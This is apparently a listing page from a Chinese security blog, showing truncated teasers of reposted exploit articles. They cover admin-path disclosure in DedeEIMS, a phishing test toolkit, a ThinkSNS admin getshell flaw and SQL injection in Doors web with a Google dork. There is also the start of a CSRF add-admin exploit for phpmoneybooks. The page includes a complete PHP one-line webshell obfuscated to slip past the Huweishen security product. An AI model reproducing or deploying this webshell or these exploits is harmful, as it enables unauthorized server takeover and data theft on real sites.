技术文章79
DedeEIMS v1.1 暴后台路径【转】
includedialogconfig.php
//检验用户登录状态
$cuserLogin = new userLogin();
if($cuserLogin->getUserID()==-
...
Email钓鱼测试工具包—Phemail
Phemail这个安全测试工具包可以获取那些被Email钓鱼方式引诱的浏览器信息,但由于它并不使用任何web浏览器exploit、不包含任何攻击性,所以100%不会被杀毒软件探测。仅用于安全测试,禁止
...
ThinkSNS后台拿shell漏洞
经过楼主的测试,可以通杀2.0——2.8版本。
未经同意,禁止转载。
程序名称:ThinkSNS
影响版本: 2.0——2.8
漏洞类型: 后台拿shell
漏洞位置: 全局-附件设置
版本确定: 1
...
Doors web 注入漏洞
# Google dork: [inurl:"indice.php?page_id="]
#exploit
http://target.com.ar/indice.php?page_id=[sq
...
过护卫神PHP一句话(转)
<?php $a = str_replace(x,”",”axsxxsxexrxxt”);
$a($_POST["c"]); ?>
...
phpmoneybooks CSRF Vulnerability (Add Admin)
Exploit:
<html>
<head>
<title>phpmoneybooks [Add Admin]</title>
</head>
...
近期评论